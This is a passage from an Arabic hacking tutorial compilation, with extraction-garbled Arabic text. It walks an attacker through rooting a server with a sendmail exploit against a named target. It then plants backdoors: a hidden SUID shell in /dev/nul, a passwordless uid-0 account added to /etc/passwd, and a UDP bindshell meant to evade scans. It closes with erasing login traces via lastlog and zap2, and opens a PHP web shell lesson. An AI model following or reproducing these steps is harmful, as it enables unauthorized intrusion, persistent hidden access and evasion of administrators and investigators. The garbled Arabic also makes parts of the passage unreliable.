‫زي ﻣﺎﻗﻠ ﺖ ﯾﺠﺐ ﻋﻠﯿﻚاﻟﺒﺎاﻧﻚ ﻣ‬
‫ﺘﺎﻟﻲ‬
‫اﻛﺎوﻧ ﺖ ‪ ..‬ﻃ ﺮﯾﻘﻪﻟﺪ ﺧﻮ لاﻟﻰاﻟﺸﯿ ﻞاﻛﺎوﻧ ﺖﻛﺎﻟ‬
‫‪bash-2.03$ telnet myshellaccount 23‬‬
‫‪...Trying xx.xx.xx.xx‬‬
‫‪.Connected to yourshellaccount‬‬
‫‪.'[^' Escape character is‬‬
‫‪Welcome to yourshellaccount‬‬
‫‪login: malicioususer‬‬
‫‪(Password: (it doesn't display‬‬
‫‪.<Last login: Fry Sep 15 11:45:34 from <yourIPaddress‬‬
‫‪sh-2.03‬‬

‫ﻃﯿﺐﻟﻮ ﻋﻨﺪﻧﺎاﻛﺴﺒﻠﻮﯾ ﺖﻟﻠﺴﻨﺪ ﻣﯿ ﻞاﺳﻤﻬﺎ ‪exploit.c‬‬


‫ﺘﺎﻟﻠﻲ‪:‬‬
‫و ﻫﻲﺗﻌﻤ ﻞﺑﻔ ﺮاوﻓ ﺮﻓﻠﻮ ‪ ..‬ﯾﻤﻜﻨﻨﺎاوﻻ ﻋﻤ ﻞاﻟﻜﻮﻣﺒﺎﯾ ﻞ وﺗﺸﻐﯿﻠﻪﻛ‬
‫‪sh-2.03$ gcc exploit.c -o exploit‬‬

‫‪sh-2.03$ ./exploit‬‬
‫‪This is a sendmail 8.9.11 exploit‬‬
‫‪usage: ./exploit target port‬‬
‫‪sh-2.03$./exploit 25 target.edu‬‬

‫ﺟﻤﯿ ﻞ ﺟﻤﯿ ﻞ ‪$...‬ﻣﻌﻨﻬﺎاﻧﻨﺎا ﺧﺪﻧﺎ ﺷﯿ ﻞ ﻫﻨﺎك‬


‫ﺗﻌﺎ ل ﻧﺸﻮ ف و ﺿﻌﻨﺎاﯾﻪ ﻋﻠﻰاﻟﺴﯿ ﺮﻓﯿ ﺮ ‪:‬‬
‫‪whoami$‬‬
‫‪root‬‬

‫‪١ ٨٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﯾﺎ ﻋﯿﻨﻲ ‪..‬ﻛﺪهاﻧﺎﺑﻘﯿ ﺖ روو ت =(‬


‫ﺘﻢ‪..‬واﻧﻤﺎﺗﺪﯾﻚﺑ ﺲ ﺷﯿ ﻞﻫﻨﺎ ل‬
‫ﺘﺨﻠﯿﻚ روو ت ﻋﻠﻰاﻟﺴﯿﺴ‬ ‫ﺘ ﺖ ﻣ ﺶﺑ‬ ‫ﻃﯿﺐﻓﯿﻪاﻟﻌﺪﯾﺪ ﻣﻦاﻻﻛﺴﺒﻠﻮﯾ‬
‫ﻟﺬﻟﻚ ﯾﺠﺐ ﻋﻠﯿﻚ نﺗﻘﻮمﺑ ﺮﻓﻊاﻛﺴﺒﻠﺔﯾ ﺖا ﺧ ﺮﻟﻮﻛ ﻞ ‪local‬‬
‫ﺘﺎ تﺑﺎﻻ فﺗﻲﺑﻲ ﻋﻠﻰﻗﺪر‬ ‫ﺘﺠﻨﺐ رﻓﻊاﻻﻛﺴﺒﻠﻮﯾ‬‫ﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰاﻟ ﺮرو تﻓﻲاﻟﻨﻈﺎم‪...‬ﺗﺬﻛ ﺮ نﺗ ﺤﺎو لانﺗ‬
‫ﺘﻄﺎ ع)ا ﺣﻨﺎ ﻋﺎﯾﺰﯾﻨﻚ =((‬
‫اﻟﻤﺴ‬
‫ﺘﺎ تا ﺧ ﺮىﺗﻌﻄﯿﻚ ﺻﻼ ﺣﯿﻪاﻇﻬﺎر ﻣﻠ ﻒاﻟﺒﺎﺳﻮرد‪..‬ايﺗﻲ ﺳﻲ =<‬ ‫ﻓﯿﻪاﻛﺴﺒﻠﻮﯾ‬

‫‪-‬و ﺿﻊﺑﺎك دور ‪-:‬‬


‫ﻗﻊاو‬‫ﺘﻐﯿ ﺮاﻟﻤﻮ‬
‫ﺘﻢ ‪ ..‬ﻣﺎذاﺑﻌﺪ ؟؟؟ﻓﻌﻼاﻧ ﺖﻓﻲاﻣﻜﺎﻧﻚانﺗﻘﻮمﺑ‬ ‫ﺟﻤﯿ ﻞ ‪..‬اذنﻓﻘﺪا ﺧﺬﻧﺎ روو ت ﻋﻠﻰاﻟﺴﯿﺴ‬
‫اﻟﺼﻔ ﺤﻪاﻟ ﺮﺋﯿﺴﯿﻪ‬
‫ﺘﺨﺪاماﻻﻣ ﺮﻓﺎﯾﻨﺪ ‪..‬‬ ‫ﻛ ﻞ ﻣﺎ ﻋﻠﯿﻚانﺗﺒ ﺤﺚ ﻋﻦاﻻﻧﺪﻛ ﺲﻓﻲاي ﻣﻜﺎناوﺑﺎﺳ‬
‫ﻗﻊ ‪edu.‬‬ ‫ﻟﻜﻦ ﻫﺬاﺑﺼ ﺮا ﺣﻪ و ﻣﻦ ﻏﯿ ﺮ زﻋ ﻞ ‪..‬ده ﺷﻐ ﻞاﻟﻼﻣ ﺮز ﻻن ﻋﯿﺐاوياﻧﻚﺗﻔ ﺮد ﻋ ﻀﻼﺗﻚ ﻋﻠﻰ ﻣﻮ‬
‫ﺘ ﺮا ق ﻫﺬهاﻟﺪوﻣﯿﻨﺎ ت‬ ‫ﻓﺎﻏﻠﺐاﻟﻬﺎﻛ ﺮزﺑﺎﻣﻜﺎﻧﻬﻢا ﺧ‬
‫ﺘ ﺮم ﻣﺜ ﻞ‬
‫ﻗﻊ ﻣ ﺤ‬ ‫ﺘﻐﯿﯿ ﺮاﻟﺼﻔ ﺤﻪاﻟ ﺮﺋﯿﺴﯿﻪﻓﻲ ﻣﻮ‬ ‫وﻟﻜﻦاﻧﺼ ﺤﻚ ﺟﺪﯾﺎﺑ‬
‫‪microsoft.com , ibm.com etc‬‬
‫ﺘﻲﺗﺴﺐاﻟﺪﯾﻦ ‪ ...‬ﻋﻠﻰاي ﺣ ﻞ ﻣ ﺶ ﻣﻮ ﺿﻮﻋﻨﺎ دﻫﻪ‬ ‫ﺘﻮىﻛﺎﻻﺑﺎ ﺣﯿﻪاواﻟ‬ ‫ﻗﻊاﻟﺴﯿﺌﻪاﻟﻤ ﺤ‬ ‫اواﻟﻤﻮا‬
‫ﻗﻊ دﻫﻪ ‪..‬ﺗﺬﻛ ﺮاﻟﺜﻼ ثاﺟﻬﺰهاﯾﺎﻫﻢ‬ ‫ﺘﻔﻆﺑﺎﻟﻤﻮ‬ ‫ﺘﻲ ﻋﺎﯾﺰﯾﻦ ﻧ ﺤ‬ ‫ﻗ‬‫ﻃﯿﺐا ﺣﻨﺎ دﻟﻮ‬
‫ﺘﻬﺪ ف ‪.‬‬ ‫ﺟﻬﺎزك‪ <-----‬ﺟﻬﺎز وﺳﯿﻂ‪<------‬اﻟﺠﻬﺎزاﻟﻤﺴ‬
‫ﺘﻲ؟؟‬ ‫ﻗ‬ ‫اذن ﺣﻨﻌﻤ ﻞاﯾﻪ دﻟﻮ‬
‫ﺘﺎﻋﻚ و ﻋﺸﺎنﺗ ﺮﺟﻊﺗﺎﻧﻲ ﯾﻠﺰﻣﻚ‬ ‫ﺘﻄﻠﻊﺑ ﺮهاﻟﺴﯿ ﺮﻓﯿ ﺮ ده وﺗﻌﻮدﻟﻠﺸﯿ ﻞﺑ‬ ‫ﺘﺒ ﺖ ‪ exit‬ﺣ‬ ‫ﻓﻲ ﺣﺎﺟﻪ ‪..‬اﻧ ﺖﻟﻮﻛ‬
‫ﻧﻔ ﺲاﻟﺨﻄﻮا ت‬
‫ﺘﻐﯿﯿ ﺮاﻟﺒﺎﺳﻮرداو رﻛﺐﺑﺎﺗ ﺶﻟﻠﺪﯾﻤﻮناﻟﻤﺼﺎباوﻗﺎم‬ ‫ﺘﻤ ﻞان ﯾﻜﻮناﻻدﻣﯿﻦﻗﺪﻗﺎمﺑ‬ ‫ﺘ ﺮهﻗﺪ ﯾ ﺤ‬ ‫وﻓﻲ ﻫﺬهاﻟﻔ‬
‫ﺑﻌﻤ ﻞاب ﺟ ﺮﯾﺪﻟﻪ‬
‫ﻣﻤﺎ ﯾﺆديانﺗﻔﺸ ﻞاﻻﻛﺴﺒﻠﻮﯾ ﺖﻓﻲ ﻋﻤﻠﻬﺎ ‪..‬واﻟ ﺤ ﻞ ؟؟‬
‫ﺘﻲ روو ت و ﻣﻤﻜﻦ ﻧﻌﻤ ﻞاﻟﻠﻲﻓﻲ ﻧﻔﺴﻨﺎ ‪...‬اذن ﻧ ﺮﻛﺐﺑﺎك دوور ﯾﺴﻤﺢﻟﻨﺎﺑﺎﻟﻌﻮدهﺑﻌﺪ ذﻟﻚﻓﻲ‬ ‫ﻗ‬‫ﺑ ﺲا ﺣﻨﺎ دﻟﻮ‬
‫ﻗ ﺖ ‪..‬‬‫اي و‬
‫ا ﺣﺴﻦﺑﺎك دور ﻫﻮهاﻟﻬﺎكاﺗﺎك ‪ ..‬ﺻﻌﺐاناﻟﻨﻮرﺗﻮن ﯾﻜﺸﻔﻪ و ﻣﻤﻚ‪...‬اه =| =|‬
‫اﯾﻪاﻟﻜﻼم ده ﯾﺎد ﯾﺎاﯾﺴ ﺮ ؟؟؟؟‬
‫ﻫﺎكاﺗﺎك =| !!!!!!‬
‫اﺳ ﻒ ﻧﺴﯿ ﺖ ‪(= ...‬‬
‫ﺘﻠ ﻒﺗﻤﺎﻣﺎ ﻋﻦاﻟﻜﻼماﻟﻔﺎ ﺿﻲ ده و ﻻ ﻣﺆا ﺧﺬه‬ ‫ﻃﺒﻌﺎاﻟﺒﺎك دورزﻓﻲ ﻣﻮ ﺿﻮﻋﻲ دهﺗﺨ‬
‫ﻃﺒﻌﺎاﻟﺒﺎك دورز دي ﻋﺎﯾﺰاﻟﻬﺎ ﻣﻮ ﺿﻮ عﻟﻮا ﺣﺪهان ﺷﺎ ءا ﺣﻄﻪﻟﻜﻢﻗ ﺮﯾﺒﺎ ‪..‬ﻟﻜﻦاﻧﺎ ﺳﺎذﻛ ﺮﻟﻜﻢاﻻﺳﺎﺳﯿﺎ ت‬
‫ﻓﻘﻂ ‪..‬‬
‫‪-١‬ازايﺗﻌﻤ ﻞ ‪sushi‬؟؟؟؟‬
‫ﻟﻜﻲﺗﻘﻮمﺑﻌﻤ ﻞ ‪ sushi‬او ‪ suid shell‬ﯾﻠﺰﻣﻚانﺗﻘﻮمﺑﻨﺴ ﺦا ل ‪bin/sh/‬‬
‫ﺘﺎﻟﻲ ‪:‬‬‫اﻟﻰ ﻣﻜﺎن ﺧﻔﻲ و ﻧﻘﻮمﺑﺎﻋﻄﺎ ءه ﺻﻼ ﺣﯿﺎ تا ل ‪suid‬ﻛﺎﻟ‬
‫‪sh-2.03$ cp /bin/sh /dev/nul‬‬
‫ﻫﻬﻬﻬﻬﻪ‬
‫ﺘﻮري ‪ .. dev‬وﻟﻮ ﺣﺼ ﻞ و ﻧﻈ ﺮ د ﺧﻠﻪﻓﺎﻧﻪﻟﻦ ﯾﺸﻌ ﺮﺑﺸﻲ ء‬ ‫ﻓﻲاﻏﻠﺐاﻻ ﺣﯿﺎناﻻدﻣﯿﻦ ﻻ ﯾﻨﻈ ﺮ دا ﺧ ﻞاﻟﺪاﯾ ﺮﻛ‬
‫ﻏ ﺮﯾﺐ ﻻنﻓﯿﻪ ﻣﻠ ﻒاﺳﺎﺳﺎاﺳﻤﻪ ‪null‬‬
‫=‪ D‬ﻻ دها ﺣﻨﺎ ﻋﯿﺎ ل ﺟﺪﻋﺎناوي =‪D‬‬

‫‪١ ٨٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪sh-2.03$ cd /dev‬‬
‫‪sh-2.03$ chown root nul‬‬

‫ﻧﻌﻄﻲ اﻟﺸﯿ ﻞاﻟﺼﻼ ﺣﯿﺎ تاﻟﻠﻲا ﺣﻨﺎ ﻋﺎﯾﺰﯾﻨﻬﺎ ‪-:‬‬


‫‪sh-2.03$ chmod 4775 nul‬‬
‫‪ ٤٧٧٥‬ﻣﻌﻨﺎﻫﺎا ل ‪ suid‬اﻟﻠﻲا ﺣﻨﺎ ﻋﺎﯾﺰﯾﻨﻬﺎ ‪.‬‬
‫ﺘﻐﻠ ﺶﻓﻲﺑﻌ ﺾاﻻﻧﻈﻤﻪ ‪ ..‬ﺧﻠﯿﻚ ﻣﻊاﻻﻣ ﺮاﻻو لﺑﯿﻌﻤ ﻞ‬
‫ﺧﻠﻲﺑﺎﻟﻚاناﻻﻣ ﺮ ‪ chmod +s nul‬ﻣﻤﻜﻦ ﻣﯿﺸ‬
‫ﻓﻲﻛﻠﻪ ‪..‬‬

‫ﺘﻨﺎ ‪..‬ﺗﻌﺎﻟﻰ ﻧﻄﻠﻊﺑ ﺮهﻛﺪه و ﻧﺸﻮ ف‬


‫ﻛﺪه ﺧﻠﺼﻨﺎ ﻣﻬﻤ‬
‫‪sh-2.03$ exit‬‬

‫ﺑﻌﺪ ‪ ٨٠‬ﯾﻮمﻟﻮ رﺟﻌﻨﺎ =‪ D‬ﺗﻌﺎ ل ﻧﺸﻮ فﻛﺪهاﻟﻠﻲ ﺣﯿ ﺤﺼ ﻞ ‪:‬‬


‫‪sh-2.03$ whoami‬‬
‫‪luser‬‬
‫‪sh-2.03$ /dev/nul‬‬
‫‪sh-2.03$ whoami‬‬
‫‪root‬‬

‫ا ﺣﻨﺎ ﺳﻮﺑ ﺮ ﯾﻮزرزاﻻنﺑﻜ ﻞ ﺳﻬﻮﻟﻪ =(‬


‫ﻓﯿﻪ ﻣﺸﻜﻠﻪ ‪..‬ﻓﻲﻛﺜﯿ ﺮ ﻣﻦاﻟﺸﯿﻠﺰﺗﻤﻨﻊاﻋﻄﺎ ء ﺻﻼ ﺣﯿﺎ تا ل ‪ suid‬ﯾﻌﻨﻲ ﻣﯿﻨﻔﻌ ﺶ ﻧ ﺤﺼ ﻞ ﻋﻠﻰا ل ‪sushi‬‬
‫ﺘﺼﺎر ل ‪A‬‬ ‫ﺘ ﺮ ق ﺷﯿ ﻞ ﺧﺎ صﺗﺎﻧﻲاﺳﻤﻪ ‪ sash‬وﻫﻮا ﺧ‬ ‫وﻓﻲ ﻫﺬهاﻟ ﺤﺎﻟﻪ ﯾﻠﺰﻣﻨﺎان ﻧ ﺮﻓﻊﻟﻠﺴﯿ ﺮﻓﯿ ﺮاﻟﻤﺨ‬
‫‪stand-alone shell‬‬
‫ذواواﻣ ﺮ ﺧﺎ ﺻﻪﺑﻪ ‪...‬‬
‫و ﻫﻮ ﯾﺴﻤﺢﺑﺎﻋﻄﺎ ء ﺻﻼ ﺣﯿﺎ تا ل‪ suid‬ل ‪ bin/sh/‬اذن ﻧﻘﺪر ﻧﻌﻤ ﻞاﻻنا ل ‪sushi‬‬

‫‪-٢‬ﻛﯿ ﻒ ﻧ ﻀﯿ ﻒ ﯾﻮزرز ﻣﺰورﯾﻦ ؟؟‬


‫ﻃﺒﻌﺎاﻧ ﺖ روو ت وﺗﻘﺪرﺗﻌﻤ ﻞﺗﻐﯿﯿ ﺮﻓﻲاﻟﻤﻠ ﻒ ‪ etc/passwd/‬و ﻣﻤﻜﻦ ﻣﻦ ﺧﻼ لاﻟﻤﻠ ﻒ دهاﻧﻚﺗ ﻀﯿ ﻒ‬
‫اي ﺣﺪاﻧ ﺖ ﻋﺎﯾﺰه‬
‫ﺘﻌﻤﺎ لاﻟﻤ ﺤ ﺮر ‪-: vi‬‬
‫ﺑﺎﺳ‬
‫‪sh-2.03$ vi /etc/passwd‬‬
‫ﺘﺨﺪاماﻟﻤ ﺤ ﺮر ‪vi‬‬
‫ﻃﺒﻌﺎ ﻻزم ﯾﻜﻮن ﻋﻨﺪكﻓﻜ ﺮه ﻋﻦﻛﯿﻔﯿﻪاﺳ‬
‫ﻗﻲ ﺳﻄ ﺮﻟﻜ ﻞ ﯾﻮزر ﻋﺎدي ﯾﻜﻮن ﻋﻠﻰاﻟﺸﻜ ﻞ ده‬ ‫ﺘﻼ‬ ‫ﻓﻲاﻟﻤﻠ ﻒ ده ﺣ‬
‫‪luser:passwd:uid:gid:startdir:shell‬‬

‫ﻓﻲ ﺣﺎﻟﻪاﻟﺴﻮﺑ ﺮ ﯾﻮزرزﺑﯿﻜﻮنا ل ‪uid & gid =0‬‬


‫اذنا ﺿ ﻒاﻟﺴﻄ ﺮ ده ‪:‬‬
‫‪dood::0:0:dood:/:/bin/sh‬‬
‫وﻛﺪهااﻧ ﺖ ﺿﻔ ﺖ ﺳﻮﺑ ﺮ ﯾﻮزرﻟﻠﻨﻈﺎم‬
‫‪sh-2.03$ su dood‬‬
‫‪sh-2.03$ whoami‬‬
‫‪dood‬‬

‫‪١ ٩٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻃﺒﻌﺎا ﺣﻨﺎ روو ت ‪..‬ﻟﯿﻪ ﻻناﻻ خ ‪ dood‬ﻛ ﻞ ﻣﻦا ل ‪ gid‬وا ل ‪ uid‬ﯾﺴﺎوي ﺻﻔ ﺮ‬

‫‪-٣‬ﻛﯿ ﻒﺗ ﻀﻊ ‪ bindshell‬؟‬
‫ﺘﻠﻨ ﺖ دﯾﻤﻮن ﻋﺒﺎره ﻋﻦﺑﺎﯾﻨﺪ ﺷﯿ ﻞ‬
‫‪ bindshell‬ﻋﺒﺎره ﻋﻦ دﯾﻤﻮن ﺷﺒﯿﻪ ﺟﺪﺑﺎ ل ‪ telnetd‬ﻓﻲاﻟ ﺤﻘﯿﻘﻪاﻟ‬
‫‪..‬‬

‫ﺘﺢﺑﻮر تاو ﻣﻨﻔﺬ ﯾﻌﻨﻲ وﻟﻜﻨﻪﻟﯿ ﺲ ﻣﻨﻔﺬ ‪ TCP‬ﺑ ﻞ ﻣﻨﻔﺬ ‪UDP‬‬ ‫اﻟﺒﺎﯾﻨﺪ ﺷﯿ ﻞ ﻫﺬا ﯾﻘﻮمﺑﻔ‬
‫و ﻃﺒﻌﺎﺑﯿﻌﻄﯿﻚ ﺷﯿ ﻞ ﻋﻨﺪاﻻﺗﺼﺎ لﺑﻬﺬااﻟﺒﻮر ت ‪..‬‬
‫ﺘﺎﻣﯿﻦ ﻋﺎده وﻓﻲ‬
‫ﺘﺎﻋﻪﻟﻠ‬
‫اﻟﻄ ﺮﯾ ﻒ واﻟﺸﯿ ﻖﻓﻲاﻟﻤﻮ ﺿﻮ عاﻧﻪاﻻدﻣﯿﻦﻟﻤﺎ ﯾﯿﺠﻲ ﯾﻌﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰاﻟﺠﻬﺎزﺑ‬
‫اﻏﻠﺐاﻻ ﺣﯿﺎناﻟﺴﻜﻦ ﯾﻜﻮن‬
‫ﻋﻠﻰ ﻣﻨﺎﻓﺬا ل ‪ TCP‬و ﻧﺎدرا ﺟﺪاان ﯾﻌﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰ ﻣﻨﺎﻓﺬﺑ ﺮوﺗﻮﻛﻮ ل ‪UDP‬‬

‫ﺛﺎر ‪-:‬‬
‫‪ -‬ﻋﻤﻠﯿﻪازاﻟﻪاﻻ‬
‫ﻓﻲ ﻧﻈﺎاماﻟﯿﻮﻧﯿﻜ ﺲ ‪..‬ﻋﻨﺪﻣﺎﺗﻘﻮمﺑﺎﻟﺪ ﺧﻮ لاﻟﻰ ﺣﺴﺎﺑﻚ ‪..‬ﻓﻨﻜﺎﺗ ﺮى رﺳﺎﻟﻪ ﻋﻨﺪاو لاﻟﺪ ﺧﻮ لﺗﻌﻠﻤﻚﺑﺎ ﺧ ﺮ ﻣ ﺮه‬
‫ﻗﻢاﻻيﺑﻲاﻟﺬي د ﺧﻠ ﺖ ﻣﻨﻪ ‪..‬‬‫ﻗﻤ ﺖﺑﻬﺎﺑﺎﻟﺪ ﺧﻮ ل و ر‬
‫ﻗﻲاﻟ ﺮﺳﺎﻟﻪ دي‬‫ﯾﻌﻨﻲ ﺳﯿﺎدﺗﻚﻟﻮ د ﺧﻠ ﺖﺑﺎﺳﻢ ﯾﻮزر وﺑﻌﺪﻛﺪهاﻟﯿﻮزر ده د ﺧ ﻞ ﺣﯿﻼ‬

‫‪.<Last login: Sun Sep 24 10:32:14 from <yourIPaddress‬‬


‫ﺘﻜﺸ ﻒ‬ ‫ﺘ‬‫و ﻃﺒﻌﺎ ﺳﯿﺎدﺗﻚﻛﺪه ﺣ‬
‫ﻻناﻟﯿﻮزر دهﻟﻮﻛﺎن ﻧﺎﺻﺢ ﺣﯿﺒﻌ ﺖاﯾﻤﯿ ﻞﻟﻼدﻣﯿﻦ و ﯾﻘﻮﻟﻪ و ﯾﺒﻠﻐﻪﺑﺎﻟﻠﻲ ﺣﺼ ﻞ‬
‫ﺘﻠﻪ رﺳﺎﻟﻪ و ﯾﻘﻮﻟﻪ ‪-:‬‬‫و ﻃﺒﻊاﻻدﻣﯿﻦﻓﻲاﻟ ﺤﺎ ل ﺣﯿﺒﻌ‬
‫ﺘﺎﻋﻪ ﻣﻮﺟﻮود ‪ ..‬و نان ﺷﺎ ءا ﷲ‬ ‫ﺘﺎﻋﻚ واﻻيﺑﻲﺑ‬ ‫ﺘﺨﺎﻓ ﺶ ﯾﺎ واد ده وا ﺣﺪ د ﺧ ﻞ ﻋﻠﻰاﻟ ﺤﺴﺎبﺑ‬ ‫ﻣ‬
‫ﺘﻠﻔﻮن وان ﺷﺎ ءاﺑﻠﻎاﻟﺒﻮﻟﯿ ﺲ ‪..‬‬‫ﻗﻢاﻟ‬‫ﺣﺎﺗﺼ ﻞﺑﻤﺰوداﻟﺨﺪﻣﻪﻓﻲاﻟﻤﻨﻄﻘﻪ واﺳﺎﻟﻪ ﻋﻦ ر‬
‫وﺑﺎﻟﻬﻨﺎ واﻟﺸﻔﺎ =(‬

‫اﻟﻤﻌﻠﻮﻣﺎ ت دي ﻣﻮﺟﻮدهﻓﻲاﻟﻤﻨﺎ ﻃ ﻖ دي‬

‫‪usr/adm/lastlog/‬‬
‫‪var/adm/lastlog/‬‬
‫‪var/log/lastlog/‬‬

‫ﺘﻢ ‪..‬‬
‫ﻗﻊ ﻣﻬ‬ ‫ﻗﯿﻬﺎﻓﻲاي ﻣﻮ‬ ‫ﺘﺨﺪام ‪ lled‬و دي ﻣﻤﻜﻦﺗﻼ‬ ‫ﯾﻤﻜﻨﻚ ﻣﺴ ﺤﻬﻢﺑﺎﺳ‬
‫ﺘﺨﺪام ‪...‬‬
‫ﻗ ﺮاهﻟﻜﻲﺗﻌ ﺮ ف ﻃ ﺮﯾﻘﻪاﻻﺳ‬ ‫ﺑﯿﻜﻮن ﻣﻌﺎه ﻣﻠ ﻒﻟﻠﻤﺴﺎﻋﺪها‬
‫ﺘﻬﺎ‬
‫ﺘﺨﻠ ﻒ ﻋﻦ ذﻟﻚ ﻣﻌﻠﻮﻣﺎ تاﯾ ﻀﺎ ﯾﻤﻜﻨﻚازاﻟ‬ ‫ﺘﺨﺪام ‪ ftp‬ﻟ ﺮﻓﻊاﻻدوا ت ﯾ‬
‫ﻓﻲ ﺣﺎﻟﻪاﺳ‬
‫ﺘﺨﺪام ‪ wted‬و ﻫﻮ ﺷﺒﯿﻪﺑﺎﻻدهاﻟﺴﺎﺑﻘﻪ ‪lled‬‬ ‫ﺑﺎﺳ‬
‫ﻣﺎذاﻟﻮ ﻃﺒﻘﻨﺎاﻻﻣ ﺮ ‪ who‬وﻟﻘﯿﻨﺎ ﻣﻌﺎﻧﺎاﻟ ﺮوو ت ؟؟‬

‫‪sh-2.03$ who‬‬
‫‪root‬‬ ‫‪tty1‬‬ ‫‪Sep 25 18:18‬‬

‫ﺘﺨﺪم ‪zap2‬‬
‫ﻣﻤﻜﻦﻓﻲاﻟ ﺤﺎﻟﻪ دي ﻧﺴ‬

‫‪١ ٩١‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

: luser ‫ﻟﻮاﺳﻤﻚ‬

sh-2.03$ ./zap2 luser


!Zap2
sh-2.03$ who
sh-2.03$

.....

١ ٩٢
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" درس ﻋﻦ اﻟـ‪) PHP Shell‬اﳉﺰء اﻷول( "‬

‫‪$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪Arab VieruZ :‬‬
‫‪$$$$$$$$$$$$$$$‬‬

‫ﺘﺨﺪﻣﺔ واواﻣ ﺮﻟﯿﻨﻜ ﺲ‬ ‫ﻣﻮ ﺿﻮ عﻟﻠﺒﻲاﺗ ﺶﺑﻲ ﺷ ﻞ ﯾﺸ ﺮ حاﻟﻄ ﺮ ق واﻟﺨﺪا عاﻟﻤﺴ‬


‫ﻗﻊ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮ و ﺣﻠﻪاﺳﻬ ﻞ ﻣﻤﺎ ﯾﻤﻜﻦ‬ ‫اﻟﺒﻲاﺗ ﺶﺑﻲ ﺷﯿ ﻞ ﻣﻠ ﻒ ﯾ ﺮﻋﺐﻛ ﻞ ﺻﺎ ﺣﺐ ﻣﻮ‬

‫ًﻓﺴﻤ ﺤﻮﻟﻲ ‪(:‬‬


‫ًﻟﻜﻦ ﺳﺄ ﻃﻮﻟﻪﻗﻠﯿﻼ‬
‫اﻟﻤﻮ ﺿﻮ عﺑﺴﯿﻂ ﺟﺪا‬

‫اﻟﺠﺰ ءاﻷو ل ‪:‬‬


‫^^^^^^^^^‬
‫اواﻣ ﺮﻟﯿﻨﻜ ﺲ‬

‫*‪*-----------------------------------------------‬‬

‫اﻣ ﺮ ﺳ ﺮداﻟﻤﻠﻔﺎ ت ‪a-ls :‬‬

‫ﺳ ﺮد ﺟﻤﯿﻊاﻟﻤﻠﻔﺎ تاﻟﻤﺨﻔﯿﺔاو ﻏﯿ ﺮﻫﺎ‬

‫*‪*-----------------------------------------------‬‬

‫ﺘﻮﯾﺎ تاﻟﻤﻠ ﻒ ‪e-cat :‬او ‪) cat‬ﻫﺎم ﺟﺪا(‬


‫اﻣ ﺮ ﻋ ﺮ ض ﻣ ﺤ‬

‫ﺘﻮﯾﺎﺗﻪ‬
‫ﺘﺢاﻟﻤﻠ ﻒ وﻋ ﺮ ض ﻣ ﺤ‬
‫ﻓ‬

‫*‪*-----------------------------------------------‬‬
‫اﻣ ﺮ ﺣﺬ فاﻟﻤﻠ ﻒ ‪f-rm :‬‬

‫ﻟ ﺤﺬ فاﻟﻤﻠ ﻒاﻟﺬيﺗ ﺮﯾﺪ‬


‫*‪*-----------------------------------------------‬‬
‫اﻣ ﺮ ﺣﺬ فاﻟﻤﺠﻠﺪ ‪d-rm :‬‬

‫ﻟ ﺤﺬ فاﻟﻤﺠﻠﺪاﻟﺬيﺗ ﺮﯾﺪ‬
‫*‪*-----------------------------------------------‬‬
‫اﻣ ﺮاﻟﻨﺴ ﺦ ‪i-cp :‬‬

‫ﻟﻨﺴ ﺦاﻟﻤﻠ ﻒاﻟﺬيﺗ ﺮﯾﺪ‬


‫*‪*-----------------------------------------------‬‬
‫ﺘﺴﻤﯿﺔ ‪mv :‬‬ ‫اﻣ ﺮاﻋﺎدةاﻟ‬

‫‪١ ٩٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺴﻤﯿﺔ‬ ‫ﻷﻋﺎدةاﻟ‬
‫*‪*-----------------------------------------------‬‬
‫ﺘﺐ وﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ تاﻛﺜ ﺮﻷﻣ ﺮ ﻣﻦاﻷواﻣ ﺮ‬
‫ﻣﻼ ﺣﻈﺔ ‪:‬ﻟﻤﻌ ﺮ فاﻟﻤﺰﯾﺪ ﻣﻦاواﻣ ﺮﻟﯿﻨﻜ ﺲﻗﻢﺑﺸ ﺮا ءاﻟﻜ‬
‫ﻛﻢﺑﻮ ﺿﻊاﻷﻣ ﺮﺛﻢ –‪help‬‬
‫ﻣﺜﺎ ل ‪help--ls :‬‬
‫*‪*-----------------------------------------------‬‬

‫اﻟﺠﺰ ءاﻟﺜﺎﻧﻲ ‪:‬‬


‫^^^^^^^^^‬
‫ﻛﯿﻔﯿﺔﺗﻨﻔﯿﺬاﻷواﻣ ﺮ ‪:‬‬

‫*‪*-----------------------------------------------‬‬

‫‪١ ٩٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺎﺑﺔاﻷﻣ ﺮاﻟﻤ ﺮادﺗﻨﻔﯿﺬه‬


‫ﺘﺎﺑﺔﻗﻢﺑﻜ‬
‫ﺘﺠﺪ ﻣ ﺮﺑﻊﻟﻠﻜ‬
‫‪ -١‬ﺳ‬

‫‪-٢‬ﻫﻨﺎﺗﻌ ﺮ ضاﻟﻤﻠﻔﺎ ت واﻟﻤﺠﻠﺪا ت‬

‫‪-٣‬ﻫﻨﺎﺗﻌ ﺮ ضاﻟﻤﺠﻠﺪا تﻓﻘﻂ‬

‫‪ -٤‬ﻣﻜﺎناﻟﻔﻠﻮدراﻟﺬيﺗﻌﻤ ﻞ ﻋﻠﯿﻪاﻵن‬

